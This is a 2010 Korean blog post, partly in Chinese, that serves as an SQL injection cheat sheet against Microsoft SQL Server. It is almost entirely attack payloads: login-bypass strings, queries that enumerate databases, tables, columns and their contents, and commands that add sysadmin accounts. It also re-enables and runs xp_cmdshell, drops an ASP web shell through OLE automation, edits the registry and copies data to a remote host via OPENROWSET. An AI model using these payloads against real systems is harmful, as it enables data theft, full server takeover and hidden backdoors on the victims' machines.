sql injection +cmdshell 등등 프로시져 정보
웹/공격 2010. 4. 16. 13:13 |출처 : http://ericson.kr/30?category=1
1. 인젝션 기본
1.http://xxx.xxx.xxx?id=1 and [조회]
select * from table where id=1 and [조회]
2.http://xxx.xxx.xxx?name=test' and [조회] and ''='
select * from table where name='test' and [조회] and ''=''
3.http://xxx.xxx.xxx?query=' and [조회] and '%25'='
select * from table where query like '%' and [조회] and '%'='%'
1)' or''='
2) ' or 1=1--
3) ' or 'a'='a--
4) 'or'='or'
5) " or 1=1--
6)or 1=1--
7) or 'a='a
8)" or "a"="a
9) ') or ('a'='a
10) ") or ("a"="a
11) ) or (1=1
2. 데이터베이스 정보 조회
0.버전 확인
and 1=(select @@VERSION)
http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
1.권한 확인
1)서버 역할의 멤버:
and 1=(IS_SRVROLEMEMBER('sysadmin'))
sysadmin,dbcreator,diskadmin,processadmin,serveradmin,setupadmin,securityadmin
2)데이터베이스 역할의 멤버:
and 1=(IS_MEMBER('db_owner'))
3)判断是否支持多句执行
;declare @a int;--
2.DB이름 확인
and 0<>db_name()
http://192.168.1.5/display.asp?keyno=188%20and%200<>db_name()
3.사용자 확인
and user>0
4.得到库名
sysdatabases内dbid为1-6的是系统自建表
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 1=(select name from master.dbo.sysdatabases where dbid=8)
5.得到表名
and 0<>(select top 1 name from master.dbo.sysobjects where xtype=char(85))
and 0<>(select top 1 name from (select top 10 * name from master.dbo.sysobjects where xtype='U' order by name asc) as table1 order by name desc)
http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
6.得到字段名
1)得到表的id
and 0<>(select count(*) from master.dbo.sysobjects where xtype='U' and name=char(97)%2Bchar(98)%2Bchar(99) and uid>(str(id)))
2)用得到的id查询列
and 0<>(select top 1 name from master.dbo.syscolumns where id=235147883)
and 0<>(select top 1 name from (select top 10 name from master.dbo.syscolumns where id=235147883 order by name asc) as table1 order by name desc)
7.得到字段内容
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from master.dbo.表名)
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from master.dbo.表名 where 字段名 not in('已得到内容'))
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from (select top 行数 字段名 from 库名.dbo.表名 order by 字段名 asc) as table1 order by 字段名 desc)
3. 기타 정보
0.계정 정보 변경
;exec sp_addlogin '아이디', '패스워드';--
;exec sp_password '이전 패스워드', '새로운 패스워드', '아이디';--
;exec master.dbo.sp_addsrvrolemember '아이디' 'sysadmin';--
;exec sp_droplogin '아이디';--
1.cmd 명령어
1)xp_cmdshell 프로시저 등록
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
;exec master.dbo.sp_dropextendedproc 'xp_cmdshell';--
;dbcc addextendedproc ("xp_cmdshell","xplog70.dll");--
2)xp_cmdshell 실행
;exec master..xp_cmdshell 'ping 111.222.333.444';--
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\';--
;exec master..xp_cmdshell 'echo 要写入内容>>绝对路径';--
3)回显
;Drop table cmd_list ;CREATE TABLE cmd_list (ComResult nvarchar(8000)) INSERT cmd_list EXEC MASTER..xp_cmdshell 'ipconfig -all';--
and (select char(94)+cast(count(1) as varchar(8000))+char(94) from comd_list where 1=1)>0
2.윈도우 서비스 제어
;exec master.dbo.xp_servicecontrol 'start', 'schedule';--
3.利用SP_OAcreate,SP_OAMETHOD执行对象
1)복원
;exec master.dbo.sp_addextendedproc 'sp_OACreate','odsole70.dll';--
;dbcc addextendedproc ("sp_OACreate","odsole70.dll");--
2)실행
;DECLARE @o INT EXEC SP_OAcreate 'wscript.shell',@o OUT EXEC SP_OAMETHOD @o,'run',null, 'J:\WINDOWS\system32\cmd.exe /c net user aaa3 /add';--
;declare @o int,@f int exec sp_oacreate 'scripting.filesystemobject',@o out exec sp_oamethod @o,'createtextfile',@f out,'j:\foo5.asp',1 exec sp_oamethod @f,'writeline',NULL,'<% set o=server.createobject("wscript.shell")' exec sp_oamethod @f,'writeline',NULL,'o.run(request.querystring("cmd")) %>'
4.浏览目录
1)创建临时表
;create table temp1(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
2)获得当前所有驱动器
;insert temp1(id,num1,num2,num3) exec master.dbo.xp_availablemedia;--
3)获得当前子目录列表
;insert into temp(id,num1) exec master.dbo.xp_subdirs 'c:\';--
4)获得所有子目录的目录树结构
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
5)搜索文件
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\ *.asp /s/a';--
6)读取表中内容
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from (select top 行数 字段名 from 库名.dbo.表名 order by 字段名 asc) as table1 order by 字段名 desc)
5.从文件导入到表中
;create table 表名(line varchar(8000));--
;bulk insert 表名 from '绝对路径';--
6.레지스트리 제어
1)레지스트리 값 exec xp_regenumvalues
;drop table temp2;create table temp2(a varchar(1000),b varchar(8000));insert into temp2 exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run';--
2)레지스트리 키 xp_regread
;drop table temp2;create table temp2(a varchar(1000),b varchar(8000));insert into temp2 exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir';--
3)레지스트리 쓰기 xp_regwrite
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','REG_SZ','hello';--
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','REG_DWORD','6';--
4)레지스트리 값 삭제 xp_regdeletevalue
;exec master.dbo.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName';--
5)레지스트리 키 삭제 xp_regdeletekey
;exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey';--
7.기타 유용한 프로시저
xp_msver Microsoft SQL Server 정보
xp_enumdsn ODBC 정보
xp_ntsec_enumdomains 도메인정보
xp_logininfo Microsoft SQL Server 로그인 정보
sp_configure 컨피그레이션
sp_helpextendedproc 프로시저 리스트
4. 复制远程数据库(反向连接)
;insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=password;Network=DBMSSOCN;Address=111.222.333.444,1433;', 'select * from dest_table') select * from src_table;--
5. 备份数据库
1)首次完整备份
;backup database 데이터베이스 to disk='경로';--
2)差异备份,生成文件较小
;backup database 데이터베이스 to disk='경로' WITH DIFFERENTIAL,FORMAT;--